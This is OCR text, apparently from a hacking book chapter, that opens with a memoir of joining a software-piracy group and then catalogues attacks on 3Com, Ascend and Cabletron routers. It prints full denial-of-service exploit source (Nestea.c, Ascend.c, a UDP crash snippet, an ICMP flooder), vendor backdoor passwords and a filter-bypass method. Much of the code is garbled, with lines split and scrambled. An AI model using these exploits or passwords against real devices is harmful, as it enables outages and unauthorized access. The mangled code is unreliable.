A Hacker's Vocation
As I stood there pondering my new found potential source of goodies, I realized I was a bit confused: The letter stated that there were a few prerequisites before I would be considered a tyro member. First and foremost, I had to draft a few paragraphs as an autobiography, including my expectations of, and prospective personal offerings to, the group. Second, I had to include a list of software, hardware, and technologies in which I considered myself skilled. The third requirement mandated a complete listing of all software and hardware in my current possession. Last, I was required to make copies of this information and mail them to the names on a list that was included on an enclosed diskette. I was especially excited to see that list. I wondered: Was it a member list? How many computer enthusiasts, like myself, could there be? I immediately popped the disk in my system and executed the file, runme.com. Upon execution, the program produced an acceptance statement, which I skimmed, and quickly clicked on Agreed. Next I was instructed to configure my printer for mailing labels. This I was happy to do since I had just purchased a batch of labels and couldn't wait to print some out. To my surprise, however, my printer kept printing and printing until I had to literally run to the store and buy some more, and then again—five packets of 50 in all. Then I had to buy 265 stamps. I couldn't believe the group had more than 260 members: How long ago had this group been established? I was eager to find out, so I mailed my requirements the very next morning. The day after, as I walked back from the post office, I thought I should make a copy of my membership disk; it did have important contacts within. But when I arrived home and loaded the diskette, the runme.com file seemed to have been deleted. (Later I discovered a few hidden files that solved that mystery.) The list was gone, so I waited.
Patience is a virtue—at least that's what I was brought up to believe. And, in this case it paid off. It wasn't long before I received my first reply as a new member of this computer club. The new package included another mailing list—different from the first one and much smaller. There was also a welcome letter and a huge list of software programs. The latter half of the welcome note included some final obligatory instructions. My first directive was to choose a handle, a nickname by which I would be referred in all correspondence with the club. I chose Ponyboy, my nickname in a neighborhood group I had belonged to some years back. The next objective was twofold: First I had to send five of the programs from my submission listing to an enclosed address. In return, as the second part of the objective, I was to choose five programs I wanted from the list enclosed with the welcome letter. I didn't have a problem sending my software (complete original disks, manuals, and packaging) as I was looking forward to receiving new replacements.
Approximately a week and a half passed before I received a response. I was surprised that it was much smaller than the one I had mailed—there was no way my selections could fit in a parcel that small. My initial suspicion was that I had been swindled, but when I opened the package, I immediately noticed three single-sided diskettes with labels and cryptic handwriting on both sides. It took a moment for me to decipher the scribble to recognize the names of computer programs that I had requested, plus what appeared to be extra software, on the second side of the third diskette. Those bonus programs read simply: hack-005. This diskette aroused my curiosity as never before. I cannot recall powering on my system and scanning a diskette so quickly before or since.
The software contained Underground disk copy programs, batches of hacking text files, and file editors from ASCII to HEX. One file included instructions on pirating commercial software, another on how to convert single-sided diskettes into using both sides (that explained the labels on both sides
427
of what would normally have been single-sided floppies). And there was more: files on hacking system passwords and bypassing CMOS and BIOS instructions. There was a very long list of phone numbers and access codes to hacker bulletin boards in almost every state. There was also information on secret meetings that were to take place in my area. I felt like a kid given free rein in a candy store. In retrospect, I believe that was the moment when I embarked on a new vocation: as a hacker.
Gateways and Routers and Internet Server Daemons
The port, socket, and service vulnerability penetrations detailed in Chapter 8 can more or less be applied to any section in this part of the book, as they were chosen because they are among the most common threats to a specific target. Using examples throughout the three chapters that comprise this part, we'll also examine specifically selected exploits, those you may already be aware of and many you probably won't have seen until now. Together, they provide important information that will help to solidify your technology foundation. And all the source code, consisting of MS Visual Basic, C, and Perl snippets, can be modified for individual assessments.
In this chapter, we cover gateways and routers and Internet server daemons. In Chapter 10, we cover operating systems, and in Chapter 11, proxies and firewalls.
Without written consent from the target company, most of these procedures are illegal in the United States and many other countries. Neither the author nor the publisher will be held accountable for the use or misuse of the information contained in this book.
Gateways and Routers
Fundamentally, a gateway is a network point that acts as a doorway between multiple networks. In a company network, for example, a proxy server may act as a gateway between the internal network and the Internet. By the same token, an SMTP gateway would allow users on the network to exchange e-messages. Gateways interconnect networks and are categorized according to their OSI model layer of operation; for example, repeaters at Physical Layer 1, bridges at Data Link Layer 2, routers at Network Layer 3, and so on. This section describes vulnerability hacking secrets for common gateways that function primarily as access routers, operating at Network Layer 4.
A router that connects any number of LANs or WANs uses information from protocol headers to build a routing table, and forwards packets based on compiled decisions. Routing hardware design is relatively straightforward, consisting of network interfaces, administration or console ports, and even auxiliary ports for out-of-band management devices such as modems. As packets travel into a router's network interface card, they are placed into a queue for processing. During this operation, the router builds, updates, and maintains routing tables while concurrently checking packet headers for next-step compilations—whether accepting and forwarding the packet based on routing policies or discarding the packet based on filtering policies. Again, at the same time, protocol performance functions provide handshaking, windowing, buffering, source quenching, and error checking.
The gateways described here also involve various terminal server, transport, and application gateway services. These Underground vulnerability secrets cover approximately 90 percent of the gateways in use today, including those of 3Com, Ascend, Cabletron, Cisco, Intel, and Nortel/Bay.
3Com
3Com (www.3com.com) has been offering technology products for over two decades. With more than 300 million users worldwide, it's no wonder 3Com is among the 100 largest companies on the Nasdaq. Relevant to this section, the company offers access products that range from small-office,
connectivity with the OfficeConnect family of products, to high-performance LAN/WAN availability, including VPN tunneling and security applications. Each solution is designed to build medium-enterprise secure remote access, intranets, and extranets. These products integrate WAN technologies such as Frame Relay, xDSL, ISDN, leased lines, and multiprotocol LAN-to-LAN connections. The OfficeConnect product line targets small to medium-sized businesses, typically providing remote-location connectivity as well as Internet access. On the other end of the spectrum, the SuperStack II and Total Control product series provide medium to large enterprises and ISPs with secure, reliable connections to branch offices, the Internet, and access points for mobile users.
Liabilities
HiPer ARC Card Denial-of-Service Attack
Synopsis: 3Com HiPer ARC vulnerable to nestea and 1234 denial-of-service (DoS) attacks. Hack State: System crash.
Vulnerabilities: HiPer ARC's running system version 4.1.11/x.
Breach: 3Com's HiPer ARC's running system version 4.1.11 are vulnerable to certain DoS attacks that cause the cards to simply crash and reboot. Hackers note: 3Com/USR's IP stacks are historically not very resistant to specific kinds of DoS attacks, such as Nestea.c variations (originally by humble of rhino9), shown here:
Nestea.c
#include #include #include #include #include #include #include #include #include #include #include
/* bsd usage works now, the original nestea.c was broken, because s
ome
braindead linsux-c0d3r was too stupid to use sendto() correctly
*/
#ifndef STRANGE_LINSUX_BYTE_ORDERING_THING
OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3
.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF #define IPH #define UDPH
0x2000 /* More IP fragment en route */ 0x14 /* IP header size */
0x8
size
/
/* UDP header 430
#define MAGIC2 108
#define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes w
e
shouldnt have access to in the kernel. to be safe, we should hit them till they die :
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr;
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket"); exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolv
e(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\
n");
exit(1);
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i) {
case 's': /* source port (should be emphe
meral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg); break; default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % Oxffff); if (!dst_prt) dst_prt = (random() % Oxffff); if (!count) count = COUNT;
fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ ");
for (i = 0; i < count; {
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "bOOm ");
usleep(500);
}
fprintf(stderr, "]\n"); return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src _prt,
u_short dst_prt)
{
int i;
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol stru
cture */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin addr.s addr = dst ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header leng
th */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length
*/
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset
*/
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by
kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address *
/
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination po
rt */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length *
/
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr * )&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto"); free(packet); exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header leng
th */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total lengt
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset *
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kern
el */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port
*/
/* UDP destination po
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt);
rt */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length *
/
if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockad
dr
*)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
byte = 0x4F; /* IP version and header leng
th */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total le ngth */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offs et */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kern
el */
= dst_ip; /* IP
= htons(src_prt); = htons(dst_prt);
= htons(8 + PADDING);
*((u_long *)p_ptr) p_ptr += 4; *((u_long *)p_ptr)
/
p_ptr += 44; *((u_short *)p_ptr) p_ptr += 2; *((u_short *)p_ptr)
rt */
p_ptr += 2; *((u_short *)p_ptr)
/
for(i=0;i
{
p_ptr[i++]=random()%255;
}
if (sendto(sock, packet, IPH + UDPH + PADDING+40, 0, (struct so
ckaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr; struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0); bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
~ }
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}
HiPer ARC Card Login
Synopsis: The HiPer ARC card establishes a potential weakness with the default adm account.
Hack State: Unauthorized access.
Vulnerabilities: HiPer ARC card v4.1.x revisions.
Breach: The software that 3Com has developed for the HiPer ARC card (v4.1.x revisions) poses potential security threats. After uploading the software, there will be a login account called adm, with no password. Naturally, security policies dictate to delete the default adm login from the configuration. However, once the unit has been configured, it is necessary to save settings and reset the box. At this point, the adm login (requiring no password), remains active and cannot be deleted.
Filtering
Synopsis: Filtering with dial-in connectivity is not effective. Basically, a user can dial in, receive a ''host" prompt, then type in any hostname without actual authentication procedures. Consequently, the system logs report that the connection was denied.
Hack State: Unauthorized access.
Vulnerabilities: Systems with the Total Control NETServer Card V.34/ISDN with Frame Relay V3.7.24. AIX 3.2.
Breach: Total Control Chassis is common in many terminal servers, so when someone dials in to an ISP, he or she may be dialing in to one of these servers. The breach pertains to systems that respond with a "host:" or similar prompt. When a port is set to "set host prompt," the access filters are commonly ignored:
sho filter allowedhosts
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.161/32 tcp dst eq 539
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.165/32 tcp dst eq 23
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.106/32 tcp dst eq 23
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 540
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.168/32 tcp dst eq 23
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3030
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 3031
permit XXX.XXX.XXX.12/24 XXX.XXX.XXX.109/32 tcp dst eq 513
deny 0.0.0.0/0 0.0.0.0/0 ip
An attacker can type a hostname twice at the "host:" prompt, and be presented with a telnet session to the target host. At this point, the hacker gains unauthorized access, such as:
sho ses
S19 hacker.target.system. Login In ESTABLISHED 4:30 Even though access is attained, the syslogs will typically report the following: XXXXXX remote_access: Packet filter does not exist. User hacker... access denied. Master Key Passwords
Synopsis: Certain 3Com switches open a doorway to hackers due to a number of "master key" passwords that have been distributed on the Internet.
Hack State: Unauthorized access to configurations.
Vulnerabilities: The CoreBuilder 2500, 3500, 6000, and 7000, or SuperStack II switch 2200, 2700, 3500, and 9300 are all affected.
Breach: According to 3Com, the master key passwords were ''accidentally found" by an Internet user and then published by hackers of the Underground. Evidently, 3Com engineers keep the passwords for use during emergencies, such as password loss.
CoreBuilder 6000/2500 username: debug password: synnet
CoreBuilder 7000 username: tech password: tech
SuperStack II Switch 2200 username: debug password: synnet
SuperStack II Switch 2700 username: tech password: tech
The CoreBuilder 3500 and SuperStack II Switch 3900 and 9300 also have these mechanisms, but the special login password is changed to match the admin-level password when the password is modified.
NetServer 8/16 DoS Attack
Synopsis: NetServer 8/16 vulnerable to nestea DoS attack. Hack State: System crash.
Vulnerabilities: The NetServer 8/16 V.34, O/S version 2.0.14.
Breach: The NetServer 8/16 is also vulnerable to Nestea.c (shown previously) DoS attack. PalmPilot Pro DoS Attack
Synopsis: PalmPilot vulnerable to nestea DoS attack. Hack State: System crash.
Vulnerabilities: The PalmPilot Pro, O/S version 2.0.x.
Breach: 3Com's PalmPilot Pro running system version 2.0.x is vulnerable to a nestea.c DoS attack, causing the system to crash and require reboot.
The source code in this chapter can be found on the CD bundled with this book.
Ascend/Lucent
The Ascend (www.ascend.com) remote-access products offer open WAN-to-LAN access and security features all packed in single units. These products are considered ideal for organizations that need to maintain a tightly protected LAN for internal data transactions, while permitting outside free access to Web servers, FTP sites, and such. These products commonly target small to medium business gateways and enterprise branch-to-corporate access entry points. Since the merger of
Lucent Technologies (www.lucent.com) with Ascend Communications, the data networking product line is much broader and more powerful and reliable.
Liabilities
Distorted UDP Attack
Synopsis: There is a flaw in the Ascend router internetworking operating system that allows the machines to be crashed by certain distorted UDP packets.
fj C Stan Z
Target AdieK orHostnarw: [21C
Figure 9.1 Successful penetration with the TigerBreach Penetrator. Hack State: System crash.
Vulnerabilities: Ascend Pipeline and MAX products.
Breach: While Ascend configurations can be modified via a graphical interface, this configurator locates Ascend routers on a network using a special UDP packet. Basically, Ascend routers listen for broadcasts (a unique UDP packet to the "discard" port 9) and respond with another UDP packet that contains the name of the router. By sending a specially distorted UDP packet to the discard port of an Ascend router, an attacker can cause the router to crash. With TigerBreach Penetrator, during a security analysis, you can verify connectivity to test for this flaw (see Figure 9.1).
An example of a program that can be modified for UDP packet transmission is shown here (Figure 9.2 shows the corresponding forms).
Crash.bas
Option Explicit
Private Sub Crash()
Socketl.RemoteHost = txtIP.Text Socketl.SendData txtName.Text + "Crash!!!"
End Sub
Synopsis: Challenging remote telnet sessions can congest the Ascend router session limit and cause the system to refuse further attempts.
Hack State: Severe congestion.
Vulnerabilities: Ascend Pipeline products.
Breach: Continuous remote telnet authentication attempts can max out system session limits, causing the router to refuse legitimate sessions.
MAX Attack
Synopsis: Attackers have been able to remotely reboot Ascend MAX units by telnetting to Port 150 while sending nonzero-length TCP Offset packets with TCPoffset.c, shown later.
Hack State: System restart.
Vulnerabilities: Ascend MAX 5x products.
TCP Offset Harassment
Synopsis: A hacker can crash an Ascend terminal server by sending a packet with nonzero-length
TCP offsets.
Hack State: System crash. Vulnerabilities: Ascend terminal servers.
Breach: Ascend.c (originally by The Posse).
Ascend.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned short compute_tcp_checksum(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr)
{
unsigned long sum; __asm__("
addl %%ecx, %%ebx
adcl %%edx, %%ebx
adcl $0, %%ebx
: "=b"(sum)
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_
TCP*256)
: "bx", "cx", "dx" );
__asm__("
movl %%ecx, %%edx
cld
cmpl $32, %%ecx jb 2f
%%ebx %%ebx %%ebx %%ebx
shrl $5, %%ecx clc
1: lodsl
adcl %%eax, lodsl
adcl %%eax, lodsl
adcl %%eax, lodsl
adcl %%eax,
lodsl
adcl %%eax, lodsl
adcl %%eax, lodsl
adcl %%eax, lodsl
adcl %%eax,
loop
adcl
movl
andl
je 4f
shrl
clc
lodsl
adcl
loop
adcl
movl
testw
je 5f
lodsw
addl
adcl
movw
test
je 6f
lodsb
addl
adcl
movl
shrl
addw
adcw
1b
$0, %%ebx %%edx, %%e< $28, %%ecx
%%eax,
3b
$0, %% $0, %%
$2, %
$2, %%ecx
%%ebx
ebx eax
%dx
%%eax, %%ebx $0, %%ebx $0, %%ax $1, %%edx
%%eax, %%ebx $0, %%ebx %%ebx, %%eax $16, %%eax
%%ax, %%bx
$0, %%bx
: "=b"(sum)
: "0"(sum), "c"(len), "S"(th)
: "ax", "bx", "cx", "dx", "si
return((~sum) & 0xffff);
}
#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) ) #define tcp_offset ( sizeof(struct iphdr) ) #define err(x) { fprintf(stderr, x); exit(1); } #define errors(x, y) { fprintf(stderr, x, y); exit(1); } struct iphdr temp_ip; int temp_socket = 0;
u_short
ip_checksum (u_short * buf, int nwords) {
unsigned long sum;
for (sum = 0; nwords > 0; nwords-- )
sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum;
void
fixhost (struct sockaddr_in *addr, char *hostname)
{
struct sockaddr_in *address; struct hostent *host;
address = (struct sockaddr_in *) addr;
(void) bzero ((char *) address, sizeof (struct sockaddr_in)); address->sin_family = AF_INET;
address ->sin_addr.s_addr = inet_addr (hostname); if ((int) address->sin_addr.s_addr == -1) {
host = gethostbyname (hostname);
if (host)
{
bcopy (host->h_addr, (char *) &address->sin_addr, host->h_length);
}
else {
puts ("Couldn't resolve address!!!"); exit (-1);
}
}
}
unsigned int lookup (host)
char *host;
{
unsigned int addr; struct hostent *he;
addr = inet_addr (host); if (addr == -1) {
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); }
return (addr);
}
unsigned short lookup_port (p) char *p;
int i;
struct servent *s;
if ((i = atoi (p)) == 0) {
if ((s = getservbyname (p, "tcp")) == NULL)
errors ("Unknown port %s\n", p); i = ntohs (s->s_port);
}
return ((unsigned short) i);
}
void
spoof_packet (struct sockaddr_in local, int fromport, \
struct sockaddr_in remote, int toport, ulong sequence, \ int sock, u_char theflag, ulong acknum, \ char *packdata, int datalen)
{
char *packet; int tempint; if (datalen > 0) datalen++;
Подпись: (char *) toport; fromport; = tempint;
malloc (psize + datalen);
packet = tempint toport = fromport
{
tcp_offset);
(packet + = htons (fromport); = htons (toport); = theflag; random (); random ();
however we randomize everything
struct tcphdr *fake_tcp; fake_tcp = (struct tcphdr * fake_tcp->th_dport fake_tcp->th_sport fake_tcp->th_flags fake_tcp ->th_seq = fake_tcp->th_ack = /* this is what really matters, else
to prevent simple rule based filters */ fake_tcp->th_off = random (); fake_tcp->th_win = random (); fake_tcp->th_urp = random ();
}
if (datalen > 0) {
char *tempbuf;
tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcph
dr));
for (tempint = 0; tempint < datalen - 1; tempint++) {
*tempbuf = *packdata;
*tempbuf++;
*packdata++;
}
*tempbuf = '\r';
{
struct iphdr *real_ip; real_ip = (struct iphdr *) packet; real_ip->version = 4; real_ip->ihl = 5;
real_ip->tot_len = htons (psize + datalen);
real_ip->tos = 0;
real_ip->ttl = 64;
real_ip->protocol = 6;
real_ip->check = 0;
real_ip->id = 10786;
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
temp_ip.saddr = htonl (ntohl (real_ip->daddr));
real_ip->daddr = htonl (ntohl (real_ip->saddr));
real_ip->saddr = temp_ip.saddr;
real_ip-
>check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1); {
struct tcphdr *another_tcp;
another_tcp = (struct tcphdr *) (packet + tcp_offset);
another_tcp->th_sum = 0;
another_tcp-
>th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,
real_ip->saddr, real_ip-
>daddr); }
} {
int result;
sock = (int) temp_socket;
result = sendto (sock, packet, psize + datalen, 0,
(struct sockaddr *) &remote, sizeof (remote));
}
free (packet);
}
void
main (argc, argv) int argc; char **argv;
{
unsigned int daddr; unsigned short dport; struct sockaddr_in sin; int s, i;
if (argc != 3)
errors ("Usage: %s
Ascend units.\n", argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n");
if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -
err ("Unable to open raw socket.\n"); if (!(daddr = lookup (argv[1])))
err ("Unable to lookup destination address.\n"); dport = lookup_port (argv[2]); sin.sin_family = AF_INET; sin.sin_addr.s_addr = daddr; sin.sin_port = dport;
fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1
r
fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[
);
/* 500 seems to be enough to kill it */ for (i = 0; i < 500; i++)
start_seq++;
local.sin_addr.s_addr = random ();
spoof_packet (local, random (), remote, dport, start_seq, (in TH_SYN | TH_RST |
Cabletron/Enterasys
The unique products offered through Cabletron/Enterasys (www.enterasys.com) provide high-speed, high-performance network access from the desktop to the data center. Clearly a virtuous rival to Cisco, this innovative line of products leads with the SmartSwitch router family, found in more and more enterprise backbones and WAN gateways. These products are designed to provide the reliability and scalability demanded by today's enterprise networks, with four key remunerations: wire-speed routing at gigabit speeds, pinpoint control over application usage, simplified management, and full-featured security.
Liabilities
CPU Jamming
Synopsis: SmartSwitch Router (SSR) product series are vulnerable to CPU flooding. Hack State: Processing interference with flooding. Vulnerabilities: SmartSwitch Router (SSR) series.
Breach: Hackers can flood the SSR CPU with processes simply by sending substantial packets (with TTL=0) through, with a destination IP address of all zeros. As explained earlier in this book, time-to-live (TTL) is defined in an IP header as how many hops a packet can travel before being dropped. A good modifiable coding example providing this technique format, originally inspired by security enthusiast and programmer Jim Huff, is provided in the following code and in Figure 9.3.
Icmpfld.bas
Dim iReturn As Long, sLowByte As String, sHighByte As String Dim sMsg As String, HostLen As Long, Host As String
Dim Hostent As Hostent, PointerToPointer As Long, ListAddress As Lo ng
Dim WSAdata As WSAdata, DotA As Long, DotAddr As String, ListAddr A s Long
Dim MaxUDP As Long, MaxSockets As Long, i As Integer Dim description As String, Status As String
Dim bReturn As Boolean, hIP As Long
Dim szBuffer As String
Dim Addr As Long
Dim RCode As String
Dim RespondingHost As String
Dim TraceRT As Boolean
Dim TTL As Integer
Const WS_VERSION_MAJOR = &H101 \ &H100 And &HFF& Const WS_VERSION_MINOR = &H101 And &HFF& Const MIN_SOCKETS_REQD = 0
Sub vbIcmpCloseHandle()
bReturn = IcmpCloseHandle(hIP)
If bReturn = False Then
MsgBox "ICMP Closed with Error", vbOKOnly, "VB4032-
ICMPEcho" End If
End Sub
Sub GetRCode()
If pIPe.Status = 0 Then
Text3.Text = Text3.Text + " Reply from " + RespondingH
ost +
": Bytes = " + Trim$(CStr(pIPe.DataSize)) + " RTT = " + Trim$(CStr(pIPe.RoundTripTime)) + "ms TTL = " + Trim$(CStr(pIPe.Options.TTL)) + Chr$(13) + Chr$(10) Else
Text3.Text = Text3.Text + " Reply from " + RespondingH
ost +
": " + RCode + Chr$(13) + Chr$(10) End If
Else
If TTL -
1 < 10 Then Text3.Text = Text3.Text + " Hop # 0" + CStr(TTL -
1) Else Text3.Text = Text3.Text + " Hop # " + CStr(TTL - 1)
Text3.Text = Text3.Text + " " + RespondingHost + Chr$(13)
+
Chr$(10) End If End Sub
Function HiByte(ByVal wParam As Integer) HiByte = wParam \ &H100 And &HFF&
End Function
Function LoByte(ByVal wParam As Integer)
LoByte = wParam And &HFF& End Function
Sub vbGetHostByName()
Dim szString As String
Host = Trim$(Text1.Text) ' Set Variable Host to V
alue
in Text1.text
szString = String(64, &H0)
Host = Host + Right$(szString, 64 - Len(Host))
If gethostbyname(Host) = SOCKET_ERROR Then ' If WS
ock32
error, then tell me about it
sMsg = "Winsock Error" & Str$(WSAGetLastError()) 'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
Else
PointerToPointer = gethostbyname(Host) ' Get t
he
pointer to the address of the winsock hostent structure CopyMemory Hostent.h_name, ByVal _
PointerToPointer, Len(Hostent) ' Copy
Winsock structure to the VisualBasic structure
ListAddress = Hostent.h_addr_list ' Get t
he
ListAddress of the Address List
CopyMemory ListAddr, ByVal ListAddress, 4 ' Copy
Winsock structure to the VisualBasic structure
CopyMemory IPLong, ByVal ListAddr, 4 ' Get t
he
first list entry from the Address List
CopyMemory Addr, ByVal ListAddr, 4
Label3.Caption = Trim$(CStr(Asc(IPLong.Byte4)) + "." + CStr(Asc(IPLong.Byte3)) _
+ "." +
CStr(Asc(IPLong.Byte2)) + "." + CStr(Asc(IPLong.Byte1))) End If End Sub
Sub vbGetHostName()
Host = String(64, &H0) ' Set Host value to a bunch of
spaces
If gethostname(Host, HostLen) = SOCKET_ERROR Then ' This ro utine
is where we get the host's name
sMsg = "WSock32 Error" & Str$(WSAGetLastError()) ' If WSOC
error, then tell me about it
'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
Host = Left$(Trim$(Host), Len(Trim$(Host)) -1) ' Trim up the results
Text1.Text = Host ' Display
the
host's name in label1 End If End Sub
Sub vbIcmpCreateFile()
hIP = IcmpCreateFile() If hIP = 0 Then
MsgBox "Unable to Create File Handle", vbOKOnly, "VBPing32" End If End Sub
Sub vbIcmpSendEcho()
Dim NbrOfPkts As Integer szBuffer =
"abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnop qrstuvw
abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklm" If IsNumeric(Text5.Text) Then
If Val(Text5.Text) < 32 Then Text5.Text = "32"
If Val(Text5.Text) > 128 Then Text5.Text = "128"
Else
Text5.Text = "32" End If
szBuffer = Left$(szBuffer, Val(Text5.Text)) If IsNumeric(Text4.Text) Then
If Val(Text4.Text) < 1 Then Text4.Text = "1"
Else
Text4.Text = "1" End If
If TraceRT = True Then Text4.Text = "1" For NbrOfPkts = 1 To Trim$(Text4.Text)
DoEvents
bReturn = IcmpSendEcho(hIP, Addr, szBuffer, Len(szBuffer),
pIPo,
pIPe, Len(pIPe) + 8, 2700)
If bReturn Then
RespondingHost = CStr(pIPe.Address(0)) + "." + CStr(pIPe.Address(1)) + "." + CStr(pIPe.Address(2)) + "." + CStr(pIPe.Address(3))
GetRCode
Else ' I hate it when this happens. If I get an ICM
P
timeout
' during a TRACERT, try again. If TraceRT Then TTL = TTL - 1
Else ' Don't worry about trying again on a PING, jus
t timeout
Text3.Text = Text3.Text + "ICMP Request Timeout" +
